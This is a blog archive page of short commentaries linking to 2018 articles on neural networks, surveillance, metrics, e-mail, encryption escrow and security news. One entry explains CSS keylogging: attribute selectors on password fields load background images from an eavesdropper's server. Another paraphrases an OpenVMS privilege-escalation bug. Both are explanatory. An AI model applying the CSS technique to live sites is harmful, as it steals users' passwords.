Glider from the game of Life, rising from the left

Unity

Archives

Blogroll

Archive for February 2018

Neural Networks as Function Simulators

2018-02-28⊺12:02:27-06:00

Some of the limitations of black-box deciders become more obvious and intuitive when one recognizes the machine-learning algorithms behind them as software tools for approximating functions, using large data sets and statistical tools for calibration.

“The Delusions of Neural Networks”
Giacomo Tesio, Medium, January 18, 2018
https://medium.com/@giacomo_59737/the-delusions-of-neural-networks-f7085d47edb6

The key points:

(A) Neural networks simulate functions and are calibrated statistically, with the assistance of large data sets comprising known argument-value pairs.

(B) Like other simulations, neural networks sometimes yield erroneous or divergent results. The functions they actually compute are usually not mathematically equal to the functions they simulate.

(C) The reason for this is that the calibration process uses only a finite number of argument-value pairs, whereas the function that the neural network is designed to simulate computes values for infinitely many arguments, or at least for many, many more arguments than are used in the calibration. (Otherwise, the simulation would be useless.) The data used in the calibration are compatible with many, many more functions than the one that the neural network is designed to simulate. The probability that calibrating the neural network results in its computing a function that is mathematically equal to the one it is designed to simulate is negligible — for practical purposes, it is zero.

(D) The problem of determining how accurately a neural network simulates the function it is designed to simulate is undecidable. There is no general algorithm to answer questions of this form. As a result, neural networks are usually validated not by proving their correctness but by empirical measurement: We apply them to arguments not used in the calibration process and compare the values they compute to the values that the functions they are designed to simulate associate with the same test arguments. When they match in a large enough percentage of cases, we pronounce the simulation a success.

(E) However, these test arguments are not generated at random, but are drawn from the same “natural” sources as the data used in the calibration of the network. The success of the simulation depends on this bias: Unless the test arguments are sufficiently similar to the data used in the calibration, the probability that the computed values will match is again negligible. This would essentially never happen if the test arguments were randomly selected.

(F) Consequently, the process of validating a neural network does not prove that it is unbiassed. On the contrary: in order to be pronounced valid, a neural network must simulate the biasses of the data set used in the calibration.

(G) In principle, it would be possible for independent judges to confirm that the data set is free from forms of bias that constitute discrimination against some protected class of persons and to provide strong empirical evidence that the function actually computed by the neural network does not actually introduce such a bias. In practice, this confirmation process would be prohibitively expensive and time-consuming.

(H) Neural networks can be used, and often are used, to simulate unknown functions. In those cases, there would be no way for a panel of independent judges even to begin the process of confirming freedom from discriminatory bias, because no one even knows whether the function that the neural network is designed to simulate exemplifies such a bias.

#black-box-deciders #neural-networks #simulation

Practical Guidance for Novice Fact-Checkers

2018-02-28⊺10:02:51-06:00

A guide to assessing the reliability of sources of information on the Internet, containing many useful strategies and warnings.

“Web Literacy for Student Fact-Checkers”
Mike Caulfield, January 8, 2017
https://webliteracy.pressbooks.com/

#fact-checking #trust

Paradigms of Artificial Intelligence Programming Is Now Free Software

2018-02-27⊺11:20:27-06:00

Peter Norvig has made his brilliant textbook on classical methods of artificial intelligence available at GitHub under the MIT license, along with all of the source code.

“Lisp Code for the Textbook ‘Paradigms of Artificial Intelligence Programming’”
Peter Norvig, GitHub, February 27, 2018
https://github.com/norvig/paip-lisp

Read and enjoy!

#artificial-intelligence #LISP #free-books

Secrecy Makes Public Discussion of the Nunes and Schiff Memos Pointless

2018-02-27⊺10:53:19-06:00

“The Problems with FISA, Secrecy, and Automatically Classified Information”
David Ruiz, Deeplinks, Electronic Frontier Foundation, February 26, 2018
https://www.eff.org/deeplinks/2018/02/problems-fisa-secrecy-and-automatically-classified-information

The gist: The key question raised in the Nunes and Schiff memos is whether the evidence supporting the Federal Bureau of Investigation's applications for a surveillance order against a prominent Republican, formerly an advisor to the President, consisted entirely of biased information funded by political opponents of the President. But neither side knows the answer to that question, because it's classified, and no member of the House Permanent Select Committee on Intelligence could provide the answer in public even if they did know it, for the same reason. The general public will never have enough evidence to answer this question or even to form a reliable opinion about it. The House Permanent Select Committee on Intelligence will never have even enough information to carry out their duty to oversee the implementation of the Foreign Intelligence Surveillance Act.

The optimists at the Electronic Frontier Foundation believe that it will someday be possible to repeal the Foreign Intelligence Surveillance Act and to restore a measure of transparency to the operations of the government's counterterrorism agencies. My own view is that those agencies are above the law and permanently out of its reach.

#Foreign-Intelligence-Surveillance-Act #oversight #Federal-Bureau-of-Investigation

Holding a Pencil Becomes a Learning Outcome

2018-02-25⊺21:03:18-06:00

*Sigh.*

“Children Struggle to Hold Pencils Due to Too Much Tech, Doctors Say”
Amelia Hill, The Guardian, February 25, 2018
https://www.theguardian.com/society/2018/feb/25/children-struggle-to-hold-pencils-due-to-too-much-tech-doctors-say

No, it's not “too much tech” — it's too little experience with crayons, building blocks, pull toys, modeling clay, and such like.

“Children are not coming into school with the hand strength and dexterity they had 10 years ago,” said Sally Payne, the head paediatric occupational therapist at the Heart of England foundation NHS Trust. “Children coming into school are being given a pencil but are increasingly not able to hold it because they don't have the fundamental movement skills.”

“To be able to grip a pencil and move it, you need strong control of the fine muscles in your fingers. Children need lots of opportunity to develop those skills.”

#child-development #technology-in-education #schools

Learning Objectives Disparaged

2018-02-24⊺17:11:45-06:00

“The Misguided Drive to Measure ‘Learning Outcomes’”
Molly Worthen, The New York Times Sunday Review, February 23, 2018
https://www.nytimes.com/2018/02/23/opinion/sunday/colleges-measure-learning-outcomes.html

The gist: Formulating elaborate hierarchies of quantifiable learning objectives and continually assessing students' notional success in achieving them is a foolish and cruel waste of everyone's time.

The ballooning assessment industry — including the tech companies and consulting firms that profit from assessment — is a symptom of higher education's crisis, not a solution to it. It preys especially on less prestigious schools and contributes to the system's deepening divide into a narrow tier of elite institutions primarily serving the rich and a vast landscape of glorified trade schools for everyone else. …

The obsession with testing that dominates primary education invaded universities, bringing with it a large support staff. Here is the first irony of learning assessment: Faced with outrage over the high cost of higher education, universities responded by encouraging expensive administrative bloat. …

If we describe college courses as mainly delivery mechanisms for skills to please a future employer, if we imply that history, literature and linguistics are more or less interchangeable “content” that convey the same mental tools, we oversimplify the intellectual complexity that makes a university education worthwhile in the first place. We end up using the language of the capitalist marketplace and speak to our students as customers rather than fellow thinkers. They deserve better.

#learning-objectives #assessment #metrics

Hyper-Analytic Management

2018-02-24⊺16:40:22-06:00

I must have missed this article when it first appeared.

“They're Watching You at Work”
Don Peck, The Atlantic, December 2013
https://www.theatlantic.com/magazine/archive/2013/12/theyre-watching-you-at-work/354681/

One of the main topics is the now-common use of surveillance technologies to micromanage employees and micromonitor their activities and every aspect of their performance:

Torrents of data are routinely collected by American companies and now sit on corporate servers, or in the cloud, awaiting analysis. Bloomberg reportedly logs every keystroke of every employee, along with their comings and goings in the office. The Las Vegas casino Harrah's tracks the smiles of the card dealers and waitstaff on the floor (its analytics team has quantified the impact of smiling on customer satisfaction). E-mail, of course, presents an especially rich vein to be mined for insights about our productivity, our treatment of co-workers, our willingness to collaborate or lend a hand, our patterns of written language, and what those patterns reveal about our intelligence, social skills, and behavior. As technologies that analyze language become better and cheaper, companies will be able to run programs that automatically trawl through the e-mail traffic of their workforce, looking for phrases or communication patterns that can be statistically associated with various measures of success or failure in particular roles.

An even more thought-provoking passage deals with data mining as a method of distinguishing candidates for software-development positions:

This past summer, I sat in on a sales presentation by Gild, a company that uses people analytics to help other companies find software engineers. I didn't have to travel far: Atlantic Media, the parent company of The Atlantic, was considering using Gild to find coders. …

The company's algorithms begin by scouring the Web for any and all open-source code, and for the coders who wrote it. They evaluate the code for its simplicity, elegance, documentation, and several other factors, including the frequency with which it's been adopted by other programmers. For code that was written for paid projects, they look at completion times and other measures of productivity. Then they look at questions and answers on social forums such as Stack Overflow, a popular destination for programmers seeking advice on challenging projects. They consider how popular a given coder's advice is, and how widely that advice ranges.

The algorithms go farther still. They assess the way coders use language on social networks from LinkedIn to Twitter; the company has determined that certain phrases and words used in association with each other can distinguish expert programmers from less skilled ones. Gild knows these phrases and words are associated with good coding because it can correlate them with its evaluation of open-source code, and with the language and online behavior of programmers in good positions at prestigious companies.

Here's the part that's most interesting: having made those correlations, Gild can then score programmers who haven't written open-source code at all, by analyzing the host of clues embedded in their online histories. They're not all obvious, or easy to explain. Vivienne Ming, Gild's chief scientist, told me that one solid predictor of strong coding is an affinity for a particular Japanese manga site.

Why would good coders (but not bad ones) be drawn to a particular manga site? By some mysterious alchemy, does reading a certain comic-book series improve one's programming skills? “Obviously, it's not a causal relationship,” Ming told me. But Gild does have 6 million programmers in its database, she said, and the correlation, even if inexplicable, is quite clear. …

Gild's CEO, Sheeroy Desai, told me that he believes his company's approach can be applied to any occupation characterized by large, active online communities, where people post and cite individual work, ask and answer professional questions, and get feedback on projects.

It cheers me somewhat to report that Gild appears to have gone out of business in 2016.

#data-mining #micromanagement #workplace-surveillance

Self-Affirmation Talk Titles Generated by a Neural Network

2018-02-23⊺16:14:52-06:00

“I Will Improve My Batography Skills.”

“New Ways to Market Your Self-Affirmation Talk, Thanks to a Neural Network”
Janelle Shane, Postcards from the Frontiers of Science, February 23, 2018
http://aiweirdness.com/post/171200336312/new-ways-to-market-your-self-affirmation-talk

#neural-networks #natural-language-processing #funny

Social Credit Scoring in the Surveillance State

2018-02-22⊺22:55:24-06:00

A fuller description of the nature and use of social-credit scores in China:

“China's Dystopian Tech Could Be Contagious”
Adam Greenfield, The Atlantic, February 14, 2018
https://www.theatlantic.com/technology/archive/2018/02/chinas-dangerous-dream-of-urban-control/553097/

Every Chinese citizen receives a literal, numeric index of their trustworthiness and virtue, and this index unlocks, well, everything. … This one number will determine the opportunities citizens are offered, the freedoms they enjoy, and the privileges they are granted.

This end-to-end grid of social control is still in its prototype stages, but three things are already becoming clear: First, where it has actually been deployed, it has teeth. Second, it has profound implications for the texture of urban life. And finally, there's nothing so distinctly Chinese about it that it couldn't be rolled out anywhere else the right conditions obtain. The advent of social credit portends changes both dramatic and consequential for life in cities everywhere — including the one you might call home.

My guess is that something like this will is coming soon to the United States. The infrastructure is already mostly in place. Extrapolating from the current state of affairs, I'd speculate that the first use of social-credit scores in the U.S. will be to manage access to posting on Facebook and Twitter. It would be one of the easier ways to exclude Russian bots and even (after a few months of data collection) Russian identity thieves. After that, new categories of doubleplusungood propaganda will really begin to proliferate, and soon social media will be safely under the control of the established elites, plus a few elderly cat fanciers and cupcake decorators who are innocuous enough to retain the privilege of posting.

#social-credit-scoring #surveillance #factoids

Misusing CSS to Capture Passwords As Users Enter Them

2018-02-21⊺14:21:03-06:00

Cascading Style Sheets, considered as a domain-specific language, is powerful enough to enable malicious Web designers to detect and record plaintext entries in text fields of interactive Web pages as users type them in. The key idea is to use selectors like input[type="password"][value$="a"] and specify that the background-image should be loaded from some URL where the eavesdropper has access to the log. The log entry will appear whenever the last character that the user typed into a password field is a lower-case a. By providing ninety-five such selectors, each loading a different background image from the eavesdropper's server, the eavesdropper can check the log to see which images were requested and in what order, and infer the entered password from that list.

“CSS-Keylogging”
“maxchehab”, GitHub, February 20, 2018
https://github.com/maxchehab/CSS-Keylogging

#Cascading-Style-Sheets #keylogging #domain-specific-languages

The New York Times Chooses to Remain Ignorant about Hacker Tech

2018-02-19⊺07:29:13-06:00

Last Tuesday, the New York Times hired Quinn Norton and then, a few hours later, got a case of the fantods and fired her. Management had belatedly discovered that some of her sources hold extreme right-wing political opinions and that, when interacting with them, she uses language that is taboo in the circles where the Grey Lady prefers to operate.

“The NY Times Fires Tech Writer Quinn Norton, And It's Complicated”
Adam Rogers, Wired, February 14, 2018
https://www.wired.com/story/the-ny-times-fires-tech-writer-quinn-norton-and-its-complicated/

#Quinn-Norton #mainstream-media #hacker-tech

The Opacity of Black-Box Metrics

2018-02-16⊺16:13:24-06:00

This week, I've been reading The Tyranny of Metrics, a new book by the historian Jerry Z. Muller of the Catholic University of America. One of the themes of the book is that metrics lose their reliability when they are transparently tied to rewards. For example, a hospital might decide to give bonuses to surgeons whose operations have a higher rate of success, as measured by the percentage of those operations after which the patient survives for at least thirty days. The idea is to improve the overall quality and performance of surgical operations in the hospital by motivating surgeons to do better work. In practice, however, what often happens is that surgeons refuse to take on high-risk patients or arrange for their patients' post-op caretakers to use heroic measures to keep them alive for at least thirty-one days. The metrics award higher scores to the surgeons who successfully game the system, and they receive their bonuses but the overall quality and performance of surgical operations do not, in fact, increase as a result. The metric has lost any reliability it once had as a measure of overall quality and performance.

It occurs to me that, as black-box deciders take over the job of assessing the performance of workers and deciding which of them should receive bonuses, the opacity of the decision systems may block this loss of reliability, by making it much more difficult, perhaps impossible, for the workers to game the system. If there is no explanation for the black-box decider's assessments, there is no way for the workers to infer that any particular tactic will change those assessments in their favor.

Of course, this also means that there is no way for managers to devise rational policies for improving the work of their staff. Because the black-box deciders are opaque and their judgements inexplicable and unaccountable, there is no way to distinguish policy changes that will have positive results (as assessed by the black-box decider) from those that will have negative results.

#black-box-deciders #metrics #opacity

Weak Arguments for Attribution of Network Attacks

2018-02-15⊺16:59:32-06:00

You would think that experienced diplomats would demand extremely reliable evidence for attributing a network attack to agents of a foreign government. But accurate attribution is so difficult, the perceived need to find someone to blame is so profound, and the notional political advantages of blaming some currently unpopular rival state are so compelling that governments are willing to proceed with accusations on incredibly weak and ambiguous evidence.

A case in point: The government of the United Kingdom has joined the United States in blaming the widespread and consequential propagation of the NotPetya ransomware on the agents of the Russian government. Here is the basis for their confident accusation:

1. More computers were affected in the Ukraine than in any other country. The Russian government hates the Ukrainian government.

2. One vector for the spread of the malware was an accounting software package used in the Ukraine. The Russian government hates Ukrainian software developers.

3. The attack “fits a pattern” that also describes other attacks that have been previously attributed to agents of the Russian government (on even flimsier evidence).

4. NotPetya was a variant of an earlier ransomware package called Petya, but it appears to have been reimplemented from scratch instead of being adapted from the Petya codebase. This demonstrates the level of technical sophistication characteristic of a nation-state. Russia is a technically sophisticated nation-state.

5. The ransomware feature of NotPetya didn't work, and provided no way for the victims to pay the ransom to the attackers. Instead, NotPetya simply waited for the payment window to run out and then wiped the targeted system's drives. Similarly, the Russian military has often used criminal operations as cover for special ops and not infrequently employs deception as a military tactic.

6. NotPetya exploited two vulnerabilities originally identified by the National Security Agency and made public by a group (nationality unknown) calling itself the Shadow Crew. Some people have speculated that the hackers who stole the NSA's tools for exploiting these vulnerabilities were agents of the Russian government.

7. Don't forget: The Russian government hates the Ukrainian government.

*Sigh.*

“What the UK Knows: Five Things That Link NotPetya to Russia”
Paul Roberts, The Security Ledger, February 15, 2018
https://securityledger.com/2018/02/what-the-uk-knows-five-things-that-link-notpetya-to-russia/

(In case you're trying to link my seven-item list to the “five things” mentioned in the article title or to the five slides in the slideshow at the end of the article: the first slide corresponds to items 1, 2, and 3 on my list, the second to my item 4, the third to my item 5, the fourth to my item 6, and the fifth to my item 7.)

#NotPetya #attribution #Russia

Microsoft C Compiler Fails to Obstruct Spectre

2018-02-15⊺14:48:06-06:00

Last month, Microsoft announced an improvement in their compiler for Visual C and C++. It now blocks some variants of the Spectre attack by inserting LFENCE instructions to block speculative execution when it detects a pattern in the code it is compiling that is characteristic of Spectre attacks. In effect, the compiler is using the antivirus technique of looking for a "signature" of the attack and applying countermeasures when it finds one.

This approach has two main limitations. Firstly, blacklisting known attacks instead of whitelisting code patterns that are known to be safe, doesn't address the vulnerability in full generality, since an unanticipated variant of the attack that has a slightly different signature can still succeed. Secondly, it complicates debugging and maintenance, since it is much more difficult to identify, by manual inspection, cases in which the countermeasures should have been applied but weren't than to find (operationally) cases in which the countermeasures were applied even though they weren't needed.

Microsoft chose the signature-blacklisting approach because it entails less of a performance penalty: Programs compiled with the new compiler run almost as fast as the vulnerable versions produced by the old compiler. If it had been designed to insert LFENCE instructions whenever it could not prove that the code being compiled was safe without them, the performance hit would have been much, much larger.

“Spectre Mitigations in Microsoft's C/C++ Compiler”
Paul Kocher, February 13, 2018
https://www.paulkocher.com/doc/MicrosoftCompilerSpectreMitigation.html

The author of this article created a rough benchmark to determine how much protection the signature-blacklisting approach actually provides. He took the proof-of-concept C program provided by the team that devised the Spectre attack in the first place and developed fourteen variations of the key function. Most of the variations were easy and straightforward, not to say trivial.

Microsoft's new C compiler correctly inserted LFENCE instructions in the original proof-of-concept code and in one of the variants (in which the key instruction was replaced with a call to a function that executed the instruction and the function was then inlined). The new C compiler generated unsafe code for the other thirteen variants.

#microsoft #spectre #mitigation

Against Dynamic E-Mail

2018-02-15⊺10:32:06-06:00

The usefulness of an individual's saved e-mail archive depends on the static and immutable nature of the content. We need our archives to serve as reliable extensions of our memories and as accurate records of the decisions, thoughts, and personal expressions of our correspondents. To the extend that modern e-mail protocols allow saved posts to incorporate content downloaded from the Internet at the time the message is (re)displayed or to execute programs that behave differently over time, they are undermining these critically important archival functions and wasting the time and effort that we put into curating our e-mail archives.

If Google's "Accelerated Mobile Pages in Gmail" project is successful, we're soon going to be receiving much more unarchivable e-mail. Thanks, fools!

“Email Is Your Electronic Memory”
Bron Gondwana, FastMail Blog, February 14, 2018
https://blog.fastmail.com/2018/02/14/email-is-your-electronic-memory/

Alas, even without the distortions introduced by dynamic content, most e-mail messages go through so many filters, transducers, ad inserters, ad removers, link rewriters, and formatters that it is rare for the content provided by the sender to reach the receiver intact anyway.

#e-mail #keeping-stuff #Accelerated-Mobile-Pages

Enforcing the GNU General Public License

2018-02-14⊺09:56:07-06:00

A lawyer for the Software Freedom Conservancy explains recent developments relating to the application of the GNU General Public License. The gist: the GPL is consistently upheld in court, but willful violators have frequently succeeded in unreasonably delaying the day of reckoning, and there are more willful violators than ever.

“A GPL-Enforcement Update”
Jonathan Corbet, LWN.net, February 13, 2018
https://lwn.net/SubscriberLink/747124/a6def304e3b87e31

One other ongoing problem is proprietary kernel modules. The SFC has even seen companies patching EXPORT_SYMBOL_GPL to get the kernel to accept their non-GPL modules, a development Sandler described as “fascinating, shocking, and deeply upsetting.”

#GNU-General-Public-License #software-licenses #Software-Freedom-Conservancy

Avoiding Paywalls

2018-02-13⊺18:12:28-06:00

Many mainstream media companies don't try to enforce paywalls against visitors who are using Private Browsing.

“How to Deprive Mainstream Media of Revenue and Get Around Their Paywalls”
Caitlin Johnstone, Medium, February 12, 2018
https://medium.com/@caityjohnstone/how-to-deprive-mainstream-media-of-revenue-and-get-around-their-paywalls-fb515deb4fb8

I've been able to build a career on attacking mainstream media narratives using only the techniques described above.

#rules-for-radicals #media-deconstruction #paywalls

Self-Driving Cars As Networked Weapons

2018-02-12⊺13:17:26-06:00

A threat analysis of self-driving cars, considered as potential weapons of hackers and terrorists.

“Self-Crashing Cars”
Zach Aysan, January 17, 2018
https://www.zachaysan.com/writing/2018-01-17-self-crashing-cars

I have a number of ideas on how to approach a solution to this problem, but the most important one is this: Engineers and software professionals need to recognize that our politicians aren't able to intelligently regulate autonomous devices and our corporations lack the incentives to completely protect us. A well-funded, open source effort with clear recommendations will be the most effective way to securing the future.

At the end of the essay, Aysan provides about forty specific recommendations about how to design secure computer networks for cars and what constraints should be imposed on them. Here's an example:

Safety modules should have no ports and no network connection to debugging devices or update servers. The code that commands them should not be alterable at the hardware layer. Their job is simple: Relay commands and initiate emergency shutdowns. They should be designed to be regularly recyclable, and should be physically replaced in secure, government run facilities when requiring an upgrade.

#security #autonomous-vehicles #network-warfare

Diminishing Returns from Deep Learning

2018-02-12⊺11:00:39-06:00

An overview of the recent achievements, acknowledged limitations, and plausible extensions of multi-level neural networks suggests that this approach to artificial intelligence is nearly played out and must be supplemented by alternative approaches in order to make further progress.

In section 3, the author identifies ten “limits on the scope of deep learning,” including some that I would consider critical and ineradicable (see section 3.5, “Deep Learning Thus Far Is Not Sufficiently Transparent,” and section 3.9, “Deep Learning Thus Far Works Well as an Approximation, But Its Answers Often Cannot Be Fully Trusted”).

“Deep Learning: A Critical Appraisal”
Gary Marcus, arXiv, January 2018
https://arxiv.org/ftp/arxiv/papers/1801/1801.00631.pdf

The transparency issue, as yet unsolved, is a potential liability when using deep learning for problem domains like financial trades or medical diagnosis, in which human users might like to understand how a given system made a given decision. … Such opacity can also lead to serious issues of bias.

None of Marcus's proposals for supplementing machine learning addresses either the transparency problem or the problem posed by adversarial examples.

#machine-learning #black-box-deciders #neural-networks

A Smart Home Snapshot, 2018

2018-02-09⊺14:03:33-06:00

What is it like to live in a smart home with lots of smart appliances and gadgets?

“The House That Spied on Me”
Kashmir Hill and Surya Mattu, Gizmodo, February 9, 2018
https://gizmodo.com/the-house-that-spied-on-me-1822429852

Getting a smart home means that everyone who lives or comes inside it is part of your personal panopticon, something which may not be obvious to them because they don't expect everyday objects to have spying abilities. One of the gadgets — the Eight Sleep Tracker — seemed aware of this, and as a privacy-protective gesture, required the email address of the person I sleep with to request his permission to show me sleep reports from his side of the bed. But it's weird to tell a gadget who you are having sex with as a way to protect privacy, especially when that gadget is monitoring the noise levels in your bedroom. …

I was looking forward to the end of the experiment and getting rid of all the Internet-connected devices I'd accumulated, as well as freeing up the many electrical outlets they'd been hogging. …

But the truth is that my house will remain smart, just like yours may be. Almost every TV on the market now is connected — because otherwise how do you Netflix and chill? — and over 25 million smart speakers were sold last year alone, with Apple soon to release its version, the HomePod, meaning a good percentage of American homes have or will have an internet-connected assistant waiting patiently for someone in the house to say their wake word. …

We may already be past the point of no return: internet functionality is a necessary component for the operation of many devices in our home, and it increasingly gets added on as a feature even when it's not strictly necessary. … Once the data is going over the wires, companies can't seem to resist peeking at it, no matter how sensitive it is.

#Internet-of-Things #smart-home #privacy

Law Enforcement Dissolves Civil Rights Universally

2018-02-09⊺10:21:57-06:00

It is now common practice for anyone who has a government job and claims to be enforcing the law to use whatever surveillance technology is available to collect data about anyone and everyone. A new bill in Congress would institutionalize this practice (and legitimize it, if it were constitutional, which it is not).

“The CLOUD Act: A Dangerous Expansion of Police Snooping on Cross-Border Data”
Camille Fischer, Deeplinks, Electronic Frontier Foundation, February 8, 2018
https://www.eff.org/deeplinks/2018/02/cloud-act-dangerous-expansion-police-snooping-cross-border-data

The bill creates an explicit provision for U.S. law enforcement … to access “the contents of a wire or electronic communication and any record or any other information” about a person regardless of where they live or where that information is located on the globe. In other words, U.S. police could compel a service provider — like Google, Facebook, or Snapchat — to hand over a user's content and metadata, even if it is stored in a foreign country, without following that foreign country's privacy laws.

Second, the bill would allow the President to enter into “executive agreements” with foreign governments that would allow each government to acquire user's data stored in the other country, without following each other's privacy laws.

#Clarifying-Overseas-Use-of-Data-Act #surveillance #law-enforcement

Universities Submit to Facebook's Surveillance Capitalism

2018-02-08⊺14:30:12-06:00

Silence, peasants! Resistance is futile!

“Please: Let's Be Real about Facebook”
Michael Stoner, Inside Higher Ed, February 8, 2018
https://www.insidehighered.com/blogs/call-action-marketing-and-communications-higher-education/please-let’s-be-real-about-facebook

Let me repeat: it gets results. for that reason — and because so many people use Facebook — it's become integral to higher ed marketing, communications, and advancement strategies. …

Let's agree that the only recourse we have is to get used to having our attention sold or stop using these services. But let's not be shocked that Facebook is doing exactly what it's designed to do.

#surveillance-capitalism #Facebook #marketing-higher-education

The iOS Bootloader Leaked

2018-02-08⊺14:12:13-06:00

The source code for the part of Apple's iOS operating system that starts at power-up and verifies and loads the rest of the kernel leaked some time last year and was even available on GitHub for a time. Apple asserted its ownership and got GitHub to remove the code, thus ensuring that black hats will give it close attention and circulate it widely, while white hats who don't already have a copy will not be able to copy it legally.

“Key iPhone Source Code Gets Posted Online in ‘Biggest Leak in History’”
Lorenzo Franceschi-Bicchierai, Motherboard, February 8, 2018
https://motherboard.vice.com/en_us/article/a34g9j/iphone-source-code-iboot-ios-leak

This means that tethered jailbreaks, which require the phone to be connected to a computer when booting, could soon be back. These jailbreaks used to be relatively easy to pull off and were common, but are now extremely hard to come by on up-to-date iOS devices, which have advanced security mechanisms. …

It's these security improvements that have effectively killed the once popular jailbreak community. Nowadays, finding bugs and vulnerabilities in iOS is something that requires a significant amount of time and resources, making the result exploits incredibly valuable. That's why the jailbreaking community gets excited for any leak of source code or any exploit that gets released publicly.

#iOS #jailbreak #source-code-leaks

The Surveillance State Always Wants More Surveillance

2018-02-08⊺13:45:15-06:00

The Electronic Frontier Foundation sued the government to obtain the opinions of the Foreign Intelligence Surveillance Court on the requests for (unconstitutional) general warrants against American citizens under section 702 of the Foreign Intelligence Surveillance Act, which notionally authorizes the court to issue specific warrants against non-citizens.

Last week, the FISC released about a third of the opinions that the EFF requested, in heavily redacted form. They show that government agencies, seeking the court's approval for warrantless mass surveillance, also tried repeatedly to sneak in language that would have established even wider collection parameters and even longer data-retention policies. Predictably, the insensate demands for ever more intensive surveillance eventually exceed any prescribed bounds, however weak.

“Newly Released Surveillance Orders Show That Even with Individualized Court Oversight, Spying Powers are Misused”
Aaron Mackey and Andrew Crocker, Deeplinks, Electronic Frontier Foundation, February 7, 2018
https://www.eff.org/deeplinks/2018/02/newly-released-surveillance-orders-show-even-individualized-court-oversight-spying

Over a period between 15 months and three years, the NSA obtained [without any court authorization] a number of communications of U.S. persons. The precise number of communications is redacted.

Rather than notifying the court that it had destroyed the communications it obtained without authorization, the NSA made an absurd argument in a bid to retain the communications: because the surveillance was unauthorized, the agency's internal procedures that require officials to delete non-relevant communications should not apply. Essentially, because the surveillance was unlawful, the law shouldn't apply and the NSA should get to keep what it had obtained.

The court rejected the NSA's argument. “One would expect the procedures' restrictions on retaining and disseminating U.S. person information to apply most fully to such communications, not, as the government would have it, to fail to apply at all,” the court wrote.

The court went on to day that “[t]here is no persuasive reason to give the [procedures] the paradoxical and self-defeating interpretation advanced by the government.”

The court then ordered the NSA to destroy the communications it had obtained without FISC authorization. … Rather than immediately complying with the order, the NSA asked the FISC once more to allow it to keep the communications.

Again the court rejected the government's arguments. “No lawful benefit can plausibly result from retaining this information, but further violation of law could ensue,” the court wrote. The court then ordered the NSA to not only delete the data, but to provide reports on the status of its destruction “until such time as the destruction process has been completed.”

That was in May 2011. Whether the NSA ever destroyed the data in question, whether it ever filed any of the required reports, and whether any further violations of law have ensued are all secrets. None of the inside parties has chosen to release the answers. Perhaps further lawsuits will yield some information.

#Foreign-Intelligence-Surveillance-Act #surveillance #National-Security-Agency

John Perry Barlow Remembered

2018-02-07⊺16:31:33-06:00

Into memory:

“John Perry Barlow, Internet Pioneer, 1947—2018”
Cindy Cohn, Deeplinks, Electronic Frontier Foundation, February 7, 2018
https://www.eff.org/deeplinks/2018/02/john-perry-barlow-internet-pioneer-1947-2018

Major parts of the Internet we all know and love exist and thrive because of Barlow's vision and leadership. He always saw the Internet as a fundamental place of freedom, where voices long silenced can find an audience and people can connect with others regardless of physical distance. …

Barlow's lasting legacy is that he devoted his life to making the Internet into “a world that all may enter without privilege or prejudice accorded by race, economic power, military force, or station of birth … a world where anyone, anywhere, may express his or her beliefs, no matter how singular, without fear of being coerced into silence or conformity.”

#John-Perry-Barlow #freedom-of-speech #cyberspace

The Open Source Technology Improvement Fund

2018-02-07⊺14:00:23-06:00

A long-overdue institution, still underfunded.

“For Open-Source Software, the Developers Are All of Us”
Derek Zimmer, Linux Journal, February 7, 2018
https://www.linuxjournal.com/content/open-source-software-developers-are-all-us

You enter information into your Google Chrome browser, on a website running Microsoft Internet Information Server, and the website is verified through Comodo certificate verification. Your data is transmitted through Cisco firewalls and routed by Juniper routers. It passes through an Intel-branded network card on your Dell server and through a SuperMicro motherboard. Then the data is transmitted through the motherboard's serial bus to the SandForce chip that controls your Solid State Disk and is then written to Micron flash memory, in an Oracle SQL database.

You are reliant on every single one of those steps being secure, in a world where the trillion-dollar problem is getting computers to do exactly what they are supposed to do. All of these systems have flows. Every step has problems and challenges. And if something goes wrong, there is no liability. The lost data damages your company, your livelihood, you. …

So how do we fix this problem? we organize and support open software development. We make sure that important free and open security projects have the resources they need to flourish and succeed. …

We have founded the Open Source Technology Improvement Fund, a 501(c)3 nonprofit whose only job is to fund security research and development for open-source software. We vet projects for viability, find out what they need to improve and get them the resource to get there. We then verify that their software is safe and secure with independent teams of software auditors, and work with the teams continuously to secure their projects against the latest threats.

#free-software #security-auditing #Open-Source-Technology-Improvement-Fund

A Privilege-Escalation Vulnerability in VMS

2018-02-07⊺09:49:14-06:00

Security researchers are still looking for vulnerabilities in operating systems that have been stable for many, many years and are still in widespread use — in this case, VMS, which runs on VAX, Alpha, and Itanium processors. Occasionally, they find one.

“Ghost in the DCL Shell: OpenVMS, Touted as Ultra Reliable, Had a Local Root Hole for 30 Years”
John Leyden, The Register, February 6, 2018
https://www.theregister.co.uk/2018/02/06/openvms_vulnerability/

VMS uses four modes: user mode; supervisor mode, where the DCL [Digital Command Language] shell runs; executive mode for privileged services; and kernel mode, which has power over the system.

VMS runs its shell in supervisor mode. A program can pass malformed command line data to DCL to process, which overflows a buffer and clobbers a return pointer in memory. There are some portions of memory with fixed addresses that all programs which run in a process share, and for some reason can hold executable code. Thus, it's possible to stash some malicious code in those shared areas, pass a booby-trapped command line to the shell to parse, and have the shell jump to the evil attacker-controlled code while still in supervisor mode. …

Furthermore, … the boundary between supervisor and executive mode is not as watertight as folks are led to believe. Thus, it is possible to leverage the escalation from user mode to supervisor mode to jump into the executive and drill deeper into the system.

#privilege-escalation #OpenVMS #buffer-overflows

Sharing Your Encryption Keys Undermines Security Guarantees

2018-02-06⊺15:13:39-06:00

Some of the bureaucrats in charge of the federal government's efforts to recruit and then punish domestic terrorists have been giving public speeches in which they advocate “responsible encryption.” It seems that encryption is an occasionally effective way for American citizens to protect their rights under the First, Fourth, Fifth, and Sixth Amendments against eavesdropping and unwarranted searches and seizures by government officials and their corporate accomplices. The G-men would prefer us to use only encryption systems that register plaintexts, keys, or both either with service providers or specialized escrow companies that can be relied on to yield our protected information to the authorities whenever they demand it.

A researcher at the Stanford Center for Internet and Society lists the ways in which such escrow systems undermine their users' security:

(A) There will be so many requests from counterterrorism and law-enforcement officials that the organization charged with the responsibilities of escrow will find it difficult to manage and restrict the distribution of their own keys:

The exceptional-access decryption key would have to be accessible by far more people than those currently entrusted with a software update signing key. That puts the key at risk, and also makes it harder to detect inappropriate use of the key. … Increasing frequency of use and the number of people with access unavoidably means increasing the risk of human error (such as carelessly storing or leaking the key) or malfeasance (such as an employee releasing the key to an unauthorized outside party in response to extortion or bribery).

